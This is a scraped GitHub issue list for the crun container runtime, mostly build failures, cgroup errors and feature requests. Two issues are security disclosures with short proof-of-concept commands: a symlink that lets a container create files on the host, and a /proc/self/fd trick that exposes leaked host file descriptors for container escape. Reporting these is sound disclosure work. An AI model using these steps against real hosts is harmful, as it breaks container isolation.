containers / crun Goto Github PK
View Code? Open in Web Editor NEWA fast and lightweight fully featured OCI runtime and C library for running containers
License: GNU General Public License v2.0
A fast and lightweight fully featured OCI runtime and C library for running containers
License: GNU General Public License v2.0
I am running configure --with-python-bindings on Ubuntu 19.10, the configure fails because it is unable to locate the python3 headers.
As far I could understand, the problem is related to:
PKG_CHECK_MODULES([PYTHON], [python], [], [AC_MSG_ERROR([*** python headers not found])])
On Ubuntu 19.10 the python3 PKGCONFIG file is python3.pc, CHECK_MODULE is search only for "python.pc".
to be compatible with runC, we need to lookup argv[0] into $PATH once we are in the new mount namespace, so that start
can fail immediately if the specified command doesn't exist.
/kind bug
$ podman --version
podman version 1.6.1
The following command fails with rootless podman.
$ podman run --rm -v /dev:/dev -it fedora /bin/bash
Error: container_linux.go:346: starting container process caused "process_linux.go:449: container init caused \"open /dev/console: permission denied\"": OCI runtime permission denied error
The current workaround is to..
$ podman run --rm -v /dev:/dev -i fedora /bin/bash
$ podman exec -it `podman ps -q` /bin/bash
How to report vulnerabilities should be clarified in the document.
While following the provided directions to build a static image, I get the following error:
$ sudo make -C contrib/static-builder-x86_64 build-image
make: Entering directory '/home/kittyhacker101/test/crun/contrib/static-builder-x86_64'
podman build -t crun-builder .
STEP 1: FROM fedora AS base
Getting image source signatures
Copying blob a83dac7d1094 done
Copying config 21304c8f88 done
Writing manifest to image destination
Storing signatures
Getting image source signatures
Copying blob 22457ad8e7df done
Copying config 6a76f80daa done
Writing manifest to image destination
Storing signatures
Error: error creating build container: The following failures happened while trying to pull image specified by "fedora" based on search registries in /etc/containers/registries.conf:
* "localhost/fedora": Error initializing source docker://localhost/fedora:latest: pinging docker registry returned: Get https://localhost/v2/: dial tcp [::1]:443: connect: connection refused
* "docker.io/library/fedora": Error committing the finished image: error adding layer with blob "sha256:a83dac7d1094257f061af9dd1d3963e1708ee568c584a22007febbb8b249fa1e": Error processing tar file(exit status 1): Error cleaning up after pivot: remove /.pivot_root929792229: device or resource busy
* "registry.fedoraproject.org/fedora": Error committing the finished image: error adding layer with blob "sha256:22457ad8e7df49c0981e036f095173263c328867ba6b7f7a35e9bcbf5ee8fc60": Error processing tar file(exit status 1): Error cleaning up after pivot: remove /.pivot_root707258341: device or resource busy
* "quay.io/fedora": Error initializing source docker://quay.io/fedora:latest: Error reading manifest latest in quay.io/fedora: error parsing HTTP 404 response body: invalid character '<' looking for beginning of value: "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\n<title>404 Not Found</title>\n<h1>Not Found</h1>\n<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>\n"
* "registry.access.redhat.com/fedora": Error initializing source docker://registry.access.redhat.com/fedora:latest: Error reading manifest latest in registry.access.redhat.com/fedora: name unknown: Repo not found
* "registry.centos.org/fedora": Error initializing source docker://registry.centos.org/fedora:latest: Error reading manifest latest in registry.centos.org/fedora: manifest unknown: manifest unknown
make: *** [Makefile:13: build-image] Error 125
make: Leaving directory '/home/kittyhacker101/test/crun/contrib/static-builder-x86_64'
I'm using the latest commit (a4440eb), I have Podman 1.4.3 installed, and I'm using Manjaro Linux.
Runc logs errors to both, the log file and stderr for errors that are returned via the main()
and some programs depend on these error messages.
https://github.com/opencontainers/runc/blob/master/main.go#L156
We should probably do the same in crun.
$ sudo crun list
cannot opendir '/run/crun': No such file or directory
$ crun list
cannot opendir '/run/user/1000/crun': No such file or directory
Perhaps crun
should automatically create a directory when required.
Hey there,
is it possible to integrate crun as a "runtime" in docker to use its ecosystem?
Like runsc from gvisor: https://github.com/google/gvisor
Adding it to the daemon.json like gvisor or something:
{
"runtimes": {
"runsc": {
"path": "/usr/local/bin/runsc"
}
}
}
Being able to use it like this:
docker run --runtime=crun --rm hello-world
It seems that the YAJL_CFLAGS
etc found via pkg-config are not used for the actual compilation. I got it to work by appending it to all the *_CFLAGS
in Makefile.am
and libocispec/Makefile.am
, but I'm not an expert in autotools and I'm not sure if that's the best approach.
I'm building v0.9.1, and I'm seeing this compilation error:
CC src/libcrun/libcrun_la-seccomp.lo
src/libcrun/seccomp.c: In function ‘libcrun_apply_seccomp’:
src/libcrun/seccomp.c:123:13: error: ‘SECCOMP_FILTER_FLAG_LOG’ undeclared (first use in this function)
flags = SECCOMP_FILTER_FLAG_LOG|SECCOMP_FILTER_FLAG_SPEC_ALLOW;
^
src/libcrun/seccomp.c:123:13: note: each undeclared identifier is reported only once for each function it appears in
src/libcrun/seccomp.c:123:37: error: ‘SECCOMP_FILTER_FLAG_SPEC_ALLOW’ undeclared (first use in this function)
flags = SECCOMP_FILTER_FLAG_LOG|SECCOMP_FILTER_FLAG_SPEC_ALLOW;
^
Looks like these flags are new since linux 4.14/4.17. Can we add something to switch based on seccomp version? Is this safe at runtime, if for example I run a static container-built binary on an older kernel? If not, maybe we also need runtime checks.
crun follows symlinks when creating mount points, allowing a malicious container to create arbitrary empty files in the host filesystem.
runc resolves the symlink relative to the container rootfs using SecureJoin and creates /opt/resolv.conf inside the container instead.
/CC @giuseppe @rhatdan @cyphar
mkdir -p rootfs/etc
ln -s /opt/resolv.conf rootfs/etc/resolv.conf
cat <<EOF > Dockerfile
FROM busybox
ADD rootfs /
EOF
podman build -t poc --no-cache .
podman run --runtime=crun poc
ls -lisaZ /opt
# 133154 0 -rwx------. 1 root root unconfined_u:object_r:usr_t:s0 0 Sep 29 16:47 resolv.conf
Works with SELinux on.
Tested with crun at 66cd22c and podman 1.5.1 on Fedora 30.
(--no-cache
required when playing with the POC due to containers/buildah#1875)
when running as a rootless user honor the user.rootlesscontainers xattrs and emulate them through a seccomp from userspace trap: https://lwn.net/Articles/756167/
I am not sure there is a requirement to keep complete cli compatibility with runc, if is not the case, it would be interesting to have "crun list -a" to be able to list non started containers.
This would be somehow equivalent to "docker ps -a" .
Currently is hard to understand/debug scenarios like the following:
$ crun create my_own_id
2019-11-08T13:51:42.000586462Z: use --console-socket with create when a terminal is used
~/tmp/test
$ crun create my_own_id
2019-11-08T13:51:45.000322611Z: container 'my_own_id' already exists
$ crun list
NAME PID STATUS BUNDLE PATH
~/tmp/test
I keep getting this when I try and create a container:
level=error msg="Container creation error: writing file 'cpu.shares': Bad file descriptor
ls /sys/fs/cgroup/cpu/kubepods/burstable/pod7f8667b0aa2fc59394329cc63d147fc3/
cgroup.clone_children crio-conmon-018a9e0c4d02ed0ac3acadcb240df7d7e718a6264af811930048f75b55d16a58 crio-conmon-845ae88564fc18e50064223a1cefd85536d0a105fd6a50d14ca48a55be936114
cgroup.procs crio-conmon-031f3ac376b34d2eecec24f263fcfd800091ad001013852ba42ecd4a5a2595e4 crio-conmon-a537c8308319eb1ab7710b9c4c4f1a590ae47c013dc38876908c8e3a7e070dbb
cpu.cfs_period_us crio-conmon-3816120e55090b077cbdf75b62696b1e58b2655b8ee5165f28662cb9c165e3e3 crio-conmon-b4d592875062642b8627445dc26a9b80556442a8879f8deeb7be43a0d3f51c33
cpu.cfs_quota_us crio-conmon-3aab6d526c5d97b401b287b6ecd28de911919940892b9a7a68e5adfdb969e57e crio-conmon-c2295e785211b185f5726c647a24841cc3e444d4ca7bd0c7e29be87794f007c3
cpu.rt_period_us crio-conmon-41c02b86cf760effc235e0b6498b45723102d23ce1daffa7cbd926ce0bd55da6 crio-conmon-d21d06f567283e6de85e51f0b87ad796fbca5f4dc397ab4748e2ae66bde5956e
cpu.rt_runtime_us crio-conmon-468e517c34b9c0c9a4b466cbd00c89f859e00ee6b01fc89db54cd4bfa5c44499 crio-conmon-d8996193794ec44cde3dc14125f0481b5f6d4ec998dc1e6ac00d09ad4f002792
cpu.shares crio-conmon-4cc0b934f3393dd33a40310ba09d6e3c9c0c2a498cfd1ceee8ac45d8d2201ba7 notify_on_release
cpu.stat crio-conmon-7fcf8b268ab7050a1d4b2ee330aa4397169b60a431174ce463dff2a2d1096a21 tasks
Notice crio-UUID is missing
cat /sys/fs/cgroup/cpu/kubepods/burstable/pod7f8667b0aa2fc59394329cc63d147fc3/cpu.shares
256
the folder is there but it is empty.
crun should support checkpointing and restoring running containers.
On Fedora 31, /proc/self/cgroup output is different after 'mock' is run on the host, I'm guessing due to systemd-nspawn usage. The new output confuses podman+crun, as well as libvirt.
Before
$ cat /proc/self/cgroup
0::/user.slice/user-1000.slice/...
After mock:
$ cat /proc/self/cgroup
1:name=systemd:/
0::/user.slice/user-1000.slice/...
$ podman run --rm -it alpine sh
Error: creating cgroup directory '/sys/fs/cgroup/name=systemd/user.slice/user-1000.slice/[email protected]/user.slice/libpod-498cc4ceeee46ea3a04a12b8e495989c92074ae1513081332fed5312a2d9dc68.scope': Permission denied: OCI runtime error
I'm not sure if the cgroup behavior is intentional or not, hence the systemd bug I filed. The kernel docs do say that it is valid for other cgroups to be listed there, but they are v1 cgroups and not v2: https://www.kernel.org/doc/html/v5.3/admin-guide/cgroup-v2.html#processes
Below is a patch that 'fixes' crun usage for me, by only attempting to create the cgroup subdirectory for the cgroupv2 root path, ignoring everything else, in this case the name=systemd
cgroup. But again I'm not sure if that's correct or not. If it is I will send a PR
diff --git a/src/libcrun/cgroup.c b/src/libcrun/cgroup.c
index 30ec248..77d3f4f 100644
--- a/src/libcrun/cgroup.c
+++ b/src/libcrun/cgroup.c
@@ -494,6 +494,10 @@ int systemd_finalize (oci_container_linux_resources *resources, int cgroup_mode,
subpath = strchr (subsystem, ':') + 1;
*(subpath - 1) = '\0';
+ /* Only process cgroupv2, which will have no listed subsystem */
+ if (strcmp(subsystem, ""))
+ continue;
+
if (strcmp (subpath, *path))
{
ret = enter_cgroup_subsystem (pid, subsystem, *path, 1, err);
In the runc era, there is a testsuite called runctst that has been matured in testing on RHEL and occasionally Fedora, which depend only on skopeo and python3-psutils.
crun has its own tests which are similar which seems have less testing coverage than runctst. Do you think it make sense to merge runctst into the crun tests to have one single python file that could use for regression testing?
Should be added to dependencies (fresh build environment inside of a ubuntu docker container):
autoconf
(./autogen.sh: 9: exec: autoreconf: not found)python3
(configure: error: no suitable Python interpreter found)The message below makes me think this is an issue between cgroups & runc. I'm not sure if this is the cause or symptomatic of something else.
STEP 1: FROM registry.access.redhat.com/ubi8
STEP 2: ADD --chown=1000:1000 ocp4 /ocp4
c9cd957f1685bbc1addeb9a8296ee140bc3ff14f116f09f793d95e4d5b658745
STEP 3: RUN yum install -y openssh-clients sudo; yum -y clean all
WARN[0000] signal: killed
ERRO[0000] container_linux.go:346: starting container process caused "process_linux.go:297: applying cgroup configuration for process caused "mountpoint for cgroup not found""
container_linux.go:346: starting container process caused "process_linux.go:297: applying cgroup configuration for process caused "mountpoint for cgroup not found""
error running container: error creating container for [/bin/sh -c yum install -y openssh-clients sudo; yum -y clean all]: : exit status 1
Error: error building at STEP "RUN yum install -y openssh-clients sudo; yum -y clean all": error while running runtime: exit status 1
It would be great to have proper documentation on what resources
are supported and unsupported in cgroup2 mode
To run inside of a ramdisk the --no-pivot
option is needed?
--no-pivot do not use pivot root to jail process inside rootfs. This should be used whenever the rootfs is on top of a ramdisk
crun list misses the running / stopped state of containers as shown with runc.
Would it possible to add it?
Had a problem with tmpfs inside of a container and not noticed it until I tried to enter it (crun exec <NAME> <CMD>
).
$ docker run -it --rm alpine:3.10
# apk -U add git gcc yajl-dev libc-dev linux-headers argp-standalone libtool automake autoconf make libcap-dev python3 libseccomp-dev
# git clone https://github.com/containers/crun && cd crun
[...]
# ./autogen.sh && ./configure && make
[...]
make[3]: Entering directory '/root/crun/libocispec'
CC src/validate.o
src/validate.c:23:10: fatal error: error.h: No such file or directory
#include <error.h>
^~~~~~~~~
compilation terminated.
make[3]: *** [Makefile:873: src/validate.o] Error 1
make[3]: Leaving directory '/root/crun/libocispec'
make[2]: *** [Makefile:680: all] Error 2
make[2]: Leaving directory '/root/crun/libocispec'
make[1]: *** [Makefile:1475: all-recursive] Error 1
make[1]: Leaving directory '/root/crun'
make: *** [Makefile:756: all] Error 2
I have podman 1.6.1 on a fc30 and fc31 host
runnning rootless
podman run --rm -it bitwardenrs/server:alpine
starts and runs on fc30 with runc
failed to run on fc31
error message is -
Error: executable file not found in $PATH: No such file or directory: OCI runtime command not found error
so tried
podman run --rm -it bitwardenrs/server:alpine /bitwarden_rs
When running a rootless oci spec, and no uid mappings are set, a specific error message should be displayed. Now it fails with a mount error.
How to reproduce:
$ sudo mv /etc/subuid /etc/subuid.off
$ sudo mv /etc/subgid /etc/subgid.off
$ crun run config.json
2019-11-08T13:14:26.000942292Z: mount 'devpts' to '/home/jpinto/tmp/rootfs/dev/pts': Invalid argument
~/tmp
The behavior from runc:
$ runc run config.json
ERRO[0000] User namespaces enabled, but no uid mappings found.
User namespaces enabled, but no uid mappings found.
I'm installing crun
as non-root user to a local directory:
GO stuff goes into /home/podman/go
and installed stuff into /home/podman/usr/
After make install
I'm getting this:
/bin/mkdir -p '/home/podman/usr/local/lib'
/bin/bash ./libtool --mode=install /usr/bin/install -c libcrun.la '/home/podman/usr/local/lib'
libtool: install: /usr/bin/install -c .libs/libcrun.lai /home/podman/usr/local/lib/libcrun.la
libtool: install: /usr/bin/install -c .libs/libcrun.a /home/podman/usr/local/lib/libcrun.a
libtool: install: chmod 644 /home/podman/usr/local/lib/libcrun.a
libtool: install: ranlib /home/podman/usr/local/lib/libcrun.a
libtool: warning: remember to run 'libtool --finish /usr/local/lib'
The last warning me a little bellyache. Libtool is somewhere (found it it in /home/go/src/github.com/containers/crun/libtool
) and /usr/local/lib
is missing the prefix.
Sure, this is a special case, but maybe a bug for others, too. But hmm, why do I need to run libtool manually at all?
I use https://github.com/genuinetools/img to pull / unpack images and it fails with:
/ # img pull alpine
Error: unable to check runc version
It checks runc version first... :(
crun --version
crun 0.7
spec: 1.0.0
+SELINUX +CAP +SECCOMP +EBPF +YAJL
runc --version
runc version spec: 1.0.1-dev
# podman run --uidmap=0:100000:5000 fedora mount | grep sysrq
Versus
# podman run fedora mount | grep sysrq
proc on /proc/sysrq-trigger type proc (ro,relatime)
I modify libpod.conf to use runc.
# podman run --uidmap=0:100000:5000 fedora mount | grep sysrq
proc on /proc/sysrq-trigger type proc (ro,relatime)
If I try to run toolbox create followed by podman start fedora-toolbox-31, I get following error (which is supposedly form crun)
Error: unable to start container "fedora-toolbox-31": cannot configure rootless cgroup using the cgroupfs manager
cannot set limits without cgroups: OCI runtime error
crun-0.10-1.fc31.x86_64 https://koji.fedoraproject.org/koji/buildinfo?buildID=1393143
crun @ b86fb1a does not seem to work with the latest Docker
$ docker run -it --rm --runtime=crun busybox
docker: Error response from daemon: OCI runtime create failed: seccomp_rule_add: unknown.
$ docker info
Client:
Debug Mode: false
Server:
Containers: 0
Running: 0
Paused: 0
Stopped: 0
Images: 26
Server Version: dev
Storage Driver: overlay2
Backing Filesystem: extfs
Supports d_type: true
Native Overlay Diff: true
Logging Driver: json-file
Cgroup Driver: cgroupfs
Plugins:
Volume: local
Network: bridge host ipvlan macvlan null overlay
Log: awslogs fluentd gcplogs gelf journald json-file local logentries splunk syslog
Swarm: inactive
Runtimes: crun kata runc runnc runsc runsc-kvm
Default Runtime: runc
Init Binary: docker-init
containerd version: 894b81a4b802e4eb2a91d1ce216b8817763c29fb
runc version: 8011af4a96d657f5ab1cff56273308dd1e13c9eb
init version: fec3683
Security Options:
apparmor
seccomp
Profile: default
Kernel Version: 4.15.0-47-generic
Operating System: Ubuntu 18.04.2 LTS
OSType: linux
Architecture: x86_64
CPUs: 2
Total Memory: 7.767GiB
Name: suda-ws01
ID: b95a52c4-8aa3-4a34-ac17-f6e0644e95cc
Docker Root Dir: /var/lib/docker
Debug Mode: true
File Descriptors: 22
Goroutines: 44
System Time: 2019-04-11T20:41:22.566149249+09:00
EventsListeners: 0
Username: akihirosuda
Registry: https://index.docker.io/v1/
Labels:
Experimental: true
Insecure Registries:
127.0.0.0/8
Live Restore Enabled: false
WARNING: No swap limit support
$ docker version
Client:
Version: 19.03.0-dev
API version: 1.40
Go version: go1.12.2
Git commit: ac758d9f
Built: Thu Apr 11 11:35:42 2019
OS/Arch: linux/amd64
Experimental: true
Server:
Engine:
Version: dev
API version: 1.40 (minimum version 1.12)
Go version: go1.12.3
Git commit: fc52433fa6
Built: Thu Apr 11 11:34:56 2019
OS/Arch: linux/amd64
Experimental: true
containerd:
Version: v1.2.6
GitCommit: 894b81a4b802e4eb2a91d1ce216b8817763c29fb
runc:
Version: 1.0.0-rc6+dev
GitCommit: 8011af4a96d657f5ab1cff56273308dd1e13c9eb
docker-init:
Version: 0.18.0
GitCommit: fec3683
crun doesn't work with latest moby seccomp profile because crun doesn't support io_uring_enter
.
Docker is reporting error on parsing crun version:
Aug 28 09:24:08 fedora-unleashed dockerd[2639]: time="2019-08-28T09:24:08.085535495-03:00" level=warning msg="failed to parse /usr/local/bin/crun version: unknown output format: crun 0.7\nspec: 1.0.0\n+SYSTEMD +SELINUX +CAP +SECCOMP +EBPF +YAJL\n"
Docker is configured like this:
{
"default-runtime": "crun",
"debug": false,
"max-concurrent-uploads": 1,
"runtimes": {
"crun": {
"path": "/usr/local/bin/crun",
"runtimeArgs": [
"--debug"
]
}
}
}
Didn't look into the code yet but it's a reproducer in 100 percent of the cases.
I feel my eyes are suffering because the current code style uses 2-space indentation. None of the successful projects I am aware of are using this style. Could we adopt something like kernel or another well-known?
the logging (src/libcrun/error.c) is currently a mess, it needs to be simplified and polished
Moby depends on runc ps
command for docker top
implementation
Host: Arch Linux x86_64
Crun version: 0.9.1
How to reproduce:
podman run --runtime=/usr/bin/crun -it --rm i386/debian:stable-slim
Result:
Sep 18 22:04:47 arch systemd-coredump[39094]: Process 39086 (bash) of user 1000 dumped core.
Stack trace of thread 1:
#0 0x00000000f7f08735 n/a (/lib/i386-linux-gnu/ld-2.28.so)
Works fine with default runtime (runc
).
$HOME is a missing environment variable in running container with crun:
podman run --name bb -ti docker.io/library/busybox sh
/ # env
HOSTNAME=77fcb215cce2
SHLVL=1
container=podman
TERM=xterm
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
PWD=/
With runc:
podman run --name bb -ti docker.io/library/busybox sh
/ # env
HOSTNAME=7913850b674c
SHLVL=1
HOME=/root
container=podman
TERM=xterm
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
PWD=/
Under musl libc, stderr
is defined as (stderr)
in stdio.h, which breaks crun and libocispec because there's a stderr
member in the context structure.
Per ISO C99, this is legal - stderr
is allowed to be a macro (see discussion here: http://lists.llvm.org/pipermail/llvm-commits/Week-of-Mon-20130506/173524.html). So, the use of stderr
as a structure member is not valid.
Error: cannot set limits without cgroups: OCI runtime error
So I tried using crun on CentOS 8 on a frankensystem with RPMs from Fedora 30 to get newer podman/conmon and crun
Version: 1.6.3-dev
RemoteAPI Version: 1
Go Version: go1.13.4
Git Commit: 8e5aad97dda150f8e871c1b394824496f4b849ea
Built: Mon Nov 4 23:51:26 2019
OS/Arch: linux/amd64
I am getting
podman run --rm -it --name tmp_101 centos:8
container create failed: cannot set limits without cgroups
The cgroup_manager is "systemd".
# rpm -q conmon podman crun
conmon-2.0.2-1.el8.x86_64
podman from master branch containers/libpod
crun-0.10.2-1.fc30.x86_64
add support for SD_NOTIFY when using crun create
and crun start
.
The current logic for handling NOTIFY_SOCKET must be changed so that we bind mount the parent directory of the notify socket. In this way "start" can create the socket that will still be accessible from the container, since the parent directory is mounted.
Line 1647 in 6365276
If I understand the spec correctly, "rwm" flag can be also written as "mwr"
https://github.com/opencontainers/runtime-spec/blob/v1.0.1/config-linux.md#device-whitelist
As discussed on IRC, creating a separate tracking bug for crun. Same issue as opencontainers/runc#2128, same PoC with crun runtime.
See #109
runc has no dangerous fds to leak, but crun does, allowing for an easy escape:
mkdir -p rootfs/proc/self/fd
touch rootfs/proc/self/fd/{4,5}
cat <<EOF > Dockerfile
FROM busybox
ADD rootfs /
VOLUME /proc
EOF
docker build -t poc .
docker run --runtime=crun --name poc poc sleep inf &
lsof -p $(pidof sleep)
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
sleep 12215 root cwd DIR 0,126 4096 927459 /
sleep 12215 root rtd DIR 0,126 4096 927459 /
sleep 12215 root txt REG 0,126 1132888 397156 /bin/sleep
sleep 12215 root mem REG 252,1 397156 /bin/sleep (path inode=11903)
sleep 12215 root 0r CHR 1,3 0t0 11168 /dev/null
sleep 12215 root 1w FIFO 0,12 0t0 571231 pipe
sleep 12215 root 2w FIFO 0,12 0t0 571232 pipe
sleep 12215 root 3u unix 0xffff993efdcf9c00 0t0 571223 @/containerd-shim/moby/aa7dd60d6ee454d873da9ebd452257e51d340a3d6aa1009c90afd5825f442690/shim.sock@ type=STREAM
sleep 12215 root 4u REG 0,24 0 572760 /run/containerd/io.containerd.runtime.v1.linux/moby/aa7dd60d6ee454d873da9ebd452257e51d340a3d6aa1009c90afd5825f442690/log.json
sleep 12215 root 6r FIFO 0,12 0t0 572766 pipe
sleep 12215 root 7w FIFO 0,12 0t0 572766 pipe
sleep 12215 root 8u REG 0,24 7632 571234 /run/docker/runtime-crun/moby/aa7dd60d6ee454d873da9ebd452257e51d340a3d6aa1009c90afd5825f442690/seccomp.bpf
sleep 12215 root 9r REG 0,3 0 4026531992 /run/docker/netns/default
podman specifies the volume mount first and then /proc, so it's not affected.
When trying to run crun
with arguments in the wrong order, it does not work but the error message is not so clear:
$ ./crun create containerid --bundle /home/alban/oci/c1
2018-03-09T17:54:33.000102555Z: error loading config.json
When using the correct order (./crun create --bundle /home/alban/oci/c1 containerid
), it works.
I found this issue when trying to run the OCI runtime validation tests.
runtime-tools seems to do the wrong thing here (I just filed opencontainers/runtime-tools#600) according to the CLI spec. But maybe the crun arguments parsing could be made more flexible, or improve the error message somehow?
I'm struggling to learn how to use Crun. Is there an intro with examples how to run a container, etc.?
Thanks.
Hi,
Thank you for crun : it's really, really more fast than runc ... 🥇
I'm actually using it in 2 little kubernetes/cri-o clusters and with podman.
I wrote an ebuild (Gentoo package: https://bugs.gentoo.org/687202) for the integration in my OS but the tag 0.5 is currently broken at execution with podman, some error like 'Bad argument[...]' , but it works fine with the commit f81874f.
Please could you do another tag?
I tried ./configure LDFLAGS=-static
but it did not produce static binary
I would like to try crun as docker runtime. How can I set it up to use it with docker run option --runtime=crun
?
I currently tried kata with --runtime=kata-runtime
and find it quite interesting. It would be nice to try crun, too.
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.